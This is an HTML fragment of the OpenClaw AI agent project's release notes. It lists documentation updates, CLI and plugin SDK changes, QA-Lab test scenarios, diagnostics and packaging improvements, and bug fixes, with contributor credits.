<li>Docs: clarify README onboarding and Gateway startup paths, WhatsApp QR/408 recovery, cron output language prompts, skill advanced features, gateway upstream 403 troubleshooting, and plugin fallback override guidance. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/deepujain/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/deepujain">@deepujain</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Zacxxx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Zacxxx">@Zacxxx</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jah-yee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jah-yee">@Jah-yee</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neyric/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neyric">@neyric</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/usimic/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/usimic">@usimic</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Renu-Cybe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Renu-Cybe">@Renu-Cybe</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BigUncle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BigUncle">@BigUncle</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SeashoreShi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SeashoreShi">@SeashoreShi</a>.</li>
<li>Docs: clarify context-pruning ratio bounds, local dashboard recovery, CLI env markers, remote onboarding token behavior, and Peekaboo Bridge permissions for subprocess agents. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ayesha-aziz123/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ayesha-aziz123">@ayesha-aziz123</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dishraters/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dishraters">@dishraters</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hougangdev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hougangdev">@hougangdev</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brandonlipman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brandonlipman">@brandonlipman</a>.</li>
<li>Docs: clarify browser CDP diagnostics, Plugin SDK allowlist imports, status-reaction timing defaults, queue steering behavior, limited-tool troubleshooting, cron HEARTBEAT handling, Telegram multi-agent groups, Bitwarden SecretRef setup, and EasyRunner deployments. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Quratulain-bilal/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Quratulain-bilal">@Quratulain-bilal</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mickey-/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mickey-">@Mickey-</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vancece/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vancece">@vancece</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xenouzik/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xenouzik">@xenouzik</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/posigit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/posigit">@posigit</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/surlymochan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/surlymochan">@surlymochan</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/janaka/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/janaka">@janaka</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/choiking/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/choiking">@choiking</a>.</li>
<li>CLI/models: let <code>openclaw models auth login</code> store a single returned provider auth profile under a requested <code>--profile-id</code>, and document named Codex OAuth profile setup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4091898835" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49315" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/49315/hovercard" href="https://github.com/openclaw/openclaw/pull/49315">#49315</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DanielLSM/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DanielLSM">@DanielLSM</a>.</li>
<li>Crabbox/Testbox: run clean sparse-checkout Testbox syncs from a temporary full checkout and route remote changed gates through Corepack pnpm.</li>
<li>Docs: clarify IPv4-only Gateway BYOH binding, trusted-proxy scope clearing, Android pairing approval, macOS Accessibility grants, Zalo profile env vars, password-store SecretRef setup, and Chinese memory navigation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/itskai-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/itskai-dev">@itskai-dev</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gwh7078/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gwh7078">@gwh7078</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/longstoryscott/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/longstoryscott">@longstoryscott</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MoeJaberr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MoeJaberr">@MoeJaberr</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yuaiccc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yuaiccc">@yuaiccc</a>.</li>
<li>Docs: consolidate GLM under Z.AI, add the Upstash Box install guide and Gateway exposure runbook, clarify MEDIA directives, Copilot and Voyage setup, config path quoting, real behavior proof, and memory-file write guidance. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BobDu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BobDu">@BobDu</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alitariksahin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alitariksahin">@alitariksahin</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jefsky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jefsky">@Jefsky</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/musaabhasan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/musaabhasan">@musaabhasan</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OmerZeyveli/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OmerZeyveli">@OmerZeyveli</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leno23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leno23">@leno23</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WuKongAI-CMU/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WuKongAI-CMU">@WuKongAI-CMU</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luoyanglang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luoyanglang">@luoyanglang</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/majin1102/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/majin1102">@majin1102</a>.</li>
<li>Docs: clarify media provider credentials, Codex/OpenClaw code-mode boundaries, Slack and Telegram ack reactions, Feishu dynamic agents, secrets plaintext boundaries, memory guidance, and Chinese glossary terms. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nielskaspers/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nielskaspers">@nielskaspers</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cosmopolitan033/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cosmopolitan033">@cosmopolitan033</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drclaw-iq/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drclaw-iq">@drclaw-iq</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexgduarte/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexgduarte">@alexgduarte</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zccyman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zccyman">@zccyman</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chengoak/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chengoak">@chengoak</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cassthebandit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cassthebandit">@cassthebandit</a>.</li>
<li>Packaging: exclude documentation images and assets from the npm tarball, reducing published package size without affecting runtime docs search or CLI behavior. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SebTardif/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SebTardif">@SebTardif</a>.</li>
<li>Media understanding: stop auto-probing Gemini CLI and use Antigravity CLI only as a lower-priority image/video fallback after configured provider APIs.</li>
<li>Diagnostics: emit sanitized <code>secrets.prepare</code> timeline spans for Gateway secret preparation so operators can distinguish secret startup latency without exposing provider names, secret ids, or secret values. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462942195" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83019" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83019/hovercard" href="https://github.com/openclaw/openclaw/pull/83019">#83019</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>.</li>
<li>Diagnostics: export bounded skill usage metrics/spans and tool source/owner labels for core, plugin, MCP, and channel tool execution without exposing raw paths or session identifiers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416373435" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80370" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/80370/hovercard" href="https://github.com/openclaw/openclaw/pull/80370">#80370</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gauravprasadgp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gauravprasadgp">@gauravprasadgp</a>.</li>
<li>Agents/subagents: limit default sub-agent bootstrap context to <code>AGENTS.md</code> and <code>TOOLS.md</code>, keeping persona, identity, user, memory, heartbeat, and setup files out of delegated workers by default. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4501180539" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85283" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85283/hovercard" href="https://github.com/openclaw/openclaw/pull/85283">#85283</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>Maintainer skills: require clean autoreview before surfacing bug-sweep PR URLs and treat changelog-only conflicts as routine busy-main churn.</li>
<li>Maintainer skills: exclude plugin SDK/API boundary work from <code>openclaw-landable-bug-sweep</code> so bugbash sweeps stay focused on small paper-cut fixes.</li>
<li>QA-Lab/diagnostics: extend the OpenTelemetry smoke harness to prove trace, metric, and log export, and add first-class Prometheus and observability smoke aliases.</li>
<li>Plugin SDK: add a generic channel-message poll sender so channel plugins can expose poll delivery without depending on channel-specific SDK facades.</li>
<li>Plugin SDK/cron delivery: route cron delivery through the modern target resolver and outbound session-route APIs, deprecate parser-backed target helpers and <code>plugin-sdk/messaging-targets</code>, and move bundled callers to <code>plugin-sdk/channel-targets</code>.</li>
<li>Crabbox: keep the local wrapper's provider validation synced with the installed Crabbox binary while preserving supported aliases such as <code>docker</code> and <code>blacksmith</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4501761454" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85302" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85302/hovercard" href="https://github.com/openclaw/openclaw/pull/85302">#85302</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hxy91819/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hxy91819">@hxy91819</a>.</li>
<li>Maintainer skills: add <code>openclaw-landable-bug-sweep</code> for producing five small, reviewed, CI-green OpenClaw bugfix PRs from issue/PR sweeps.</li>
<li>Control UI/chat: add search and Load More pagination to the chat session picker, keeping initial session loads bounded while making older conversations reachable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4500085034" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85237" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85237/hovercard" href="https://github.com/openclaw/openclaw/pull/85237">#85237</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>CLI/onboarding: start classic onboarding when bare <code>openclaw</code> runs before an authored config exists, while keeping configured installs on Crestodian. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331787394" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72343" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72343/hovercard" href="https://github.com/openclaw/openclaw/pull/72343">#72343</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fuller-stack-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fuller-stack-dev">@fuller-stack-dev</a>.</li>
<li>Discord: allow configuring a bounded <code>agentComponents.ttlMs</code> callback registry lifetime for long-running component workflows, with per-account overrides and a 24-hour cap. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4478496189" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84189" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84189/hovercard" href="https://github.com/openclaw/openclaw/pull/84189">#84189</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100menotu001/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100menotu001">@100menotu001</a>.</li>
<li>xAI/Grok: reuse xAI OAuth auth profiles for Grok <code>web_search</code>, thread active-agent auth through web search, add Grok model aliases, and let media providers declare default operation timeouts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4499295136" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85182" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85182/hovercard" href="https://github.com/openclaw/openclaw/pull/85182">#85182</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fuller-stack-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fuller-stack-dev">@fuller-stack-dev</a>.</li>
<li>Plugin SDK: add row-level session workflow helpers and deprecate <code>loadSessionStore</code> so plugins can read and patch sessions without depending on the legacy whole-store shape. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4489637163" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84693" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84693/hovercard" href="https://github.com/openclaw/openclaw/pull/84693">#84693</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efpiva/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efpiva">@efpiva</a>.</li>
<li>Gateway/plugins: reuse a compatible Gateway startup plugin registry during dispatch so safe plugin dispatches avoid redundant registry loading. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4481133270" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84324" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84324/hovercard" href="https://github.com/openclaw/openclaw/pull/84324">#84324</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ai-hpc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ai-hpc">@ai-hpc</a>.</li>
<li>Plugins/SDK: add a general <code>embeddingProviders</code> capability contract and registration API so embeddings can become a reusable provider surface outside memory-specific adapters.</li>
<li>Dependencies: refresh provider, plugin, UI, and tooling packages, update <code>protobufjs</code> to 8.4.0 to clear the current npm advisory, and carry the Claude ACP completion patch forward to <code>@agentclientprotocol/claude-agent-acp</code> 0.36.1.</li>
<li>Agents/tools: remove the old sender-owner tool gating path so configured tools stay visible for trusted sessions while command and channel-action auth still carry real sender identity.</li>
<li>QA-Lab: add curated mock JSONL replay fixtures and first-drift reporting for runtime-parity audits. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416039198" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80323" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/80323/hovercard" href="https://github.com/openclaw/openclaw/pull/80323">#80323</a>, refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4415102376" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80176" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/80176/hovercard" href="https://github.com/openclaw/openclaw/issues/80176">#80176</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: add a QA bus tool-trace visibility scenario for sanitized tool-call assertions.</li>
<li>QA-Lab: replace generic evidence framing in seeded scenario prompts with concrete observed QA behavior.</li>
<li>QA-Lab: list named scenario packs in the coverage report so personal-agent privacy coverage stays visible in audits.</li>
<li>QA-Lab: list live transport lane membership in the coverage report so real transport checks stay separate from seeded qa-channel scenarios.</li>
<li>Release/package: run package integrity checks before package acceptance lanes so public install/update validation fails before private QA assets can leak into the package.</li>
<li>QA-Lab: include the optional 100-turn runtime parity soak in release-soak artifacts so long-run Codex/Pi transcript drift stays visible outside the default gate. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416567023" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80395" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/80395/hovercard" href="https://github.com/openclaw/openclaw/issues/80395">#80395</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: add a live-only long-context progress watchdog scenario for Codex app-server timeout and stalled-run sentinels. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416039198" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80323" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/80323/hovercard" href="https://github.com/openclaw/openclaw/pull/80323">#80323</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: tag gateway restart recovery and streaming final-integrity scenarios as live-only runtime parity lanes. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416039198" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80323" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/80323/hovercard" href="https://github.com/openclaw/openclaw/pull/80323">#80323</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: add a personal-agent failure recovery scenario that checks honest partial status, retry boundaries, and local recovery artifacts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4473904192" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83872" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83872/hovercard" href="https://github.com/openclaw/openclaw/pull/83872">#83872</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iFiras-Max1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iFiras-Max1">@iFiras-Max1</a>.</li>
<li>QA-Lab: include an opt-in <code>update.run</code> package self-upgrade sentinel for destructive latest-package recovery checks.</li>
<li>QA-Lab: add Codex plugin lifecycle and auth-profile fixture coverage for missing installs, pinned-version drift, first-turn install ordering, and doctor migration safety. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416039198" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80323" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/80323/hovercard" href="https://github.com/openclaw/openclaw/pull/80323">#80323</a>, refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4415100585" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80174" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/80174/hovercard" href="https://github.com/openclaw/openclaw/issues/80174">#80174</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>Models/perf: pre-warm the provider auth-state map at gateway startup so <code>/models</code> and every model-listing call short-circuits the per-provider plugin / external-CLI discovery on the hot path. Per-call cost drops from ~20 s to ~5 ms (~4,100×); the one-time startup warm resets and re-warms after hot reloads. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4491926618" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84816" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84816/hovercard" href="https://github.com/openclaw/openclaw/pull/84816">#84816</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sjf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sjf">@sjf</a>.</li>
<li>Release/security: ship the root npm package and OpenClaw-owned npm plugins with generated shrinkwrap, support bundled plugin runtime dependencies for suitable plugin tarballs, and require review for lockfile/shrinkwrap changes so published installs use locked dependency graphs.</li>
<li>Tests/perf: isolate doctor core health check unit coverage from real skills/workspace discovery so <code>doctor-core-checks</code> no longer dominates unit perf while keeping one real skills-readiness smoke. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4484275654" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84493" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84493/hovercard" href="https://github.com/openclaw/openclaw/pull/84493">#84493</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/frankekn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/frankekn">@frankekn</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Gateway/update: avoid fetching unrelated tags during dev-channel git updates so moved release tags do not block branch-based updates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4490745188" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84737" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84737/hovercard" href="https://github.com/openclaw/openclaw/pull/84737">#84737</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rubencu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rubencu">@rubencu</a>.</li>
<li>CLI/update: suppress the expected future-config warning while an old update parent hands off to the freshly installed post-core process.</li>
<li>MiniMax: store OAuth token expiry as an absolute millisecond timestamp so OAuth profiles no longer appear expired on every request. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466890226" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83480" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83480/hovercard" href="https://github.com/openclaw/openclaw/pull/83480">#83480</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NianJiuZst/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NianJiuZst">@NianJiuZst</a>.</li>
<li>Agents/Anthropic: strip missing or blank thinking signatures for signed-thinking providers even when recovery supplies a narrow replay policy without signature preservation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4483026927" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84430" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/84430/hovercard" href="https://github.com/openclaw/openclaw/issues/84430">#84430</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4483407420" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84448" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84448/hovercard" href="https://github.com/openclaw/openclaw/pull/84448">#84448</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NianJiuZst/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NianJiuZst">@NianJiuZst</a>.</li>
<li>Agents/channels: send a visible notice when an aborted main session cannot be resumed after restart, including Telegram group targets. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4509360796" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85805" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85805/hovercard" href="https://github.com/openclaw/openclaw/pull/85805">#85805</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pfrederiksen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pfrederiksen">@pfrederiksen</a>.</li>
<li>Discord/voice: serialize overlapping voice joins, retry aborted startup readiness within the configured timeout, upgrade meeting-notes-only sessions to realtime when the normal follow join arrives, detach promoted meeting-notes ownership without leaving voice, and include <code>OpenClaw</code> in default realtime wake names.</li>
<li>Gateway/restart: honor the configured restart drain budget for embedded runs and avoid spending the deferral timeout twice after forced restart timeouts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4507967040" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85708" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85708/hovercard" href="https://github.com/openclaw/openclaw/pull/85708">#85708</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kaspre/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kaspre">@Kaspre</a>.</li>
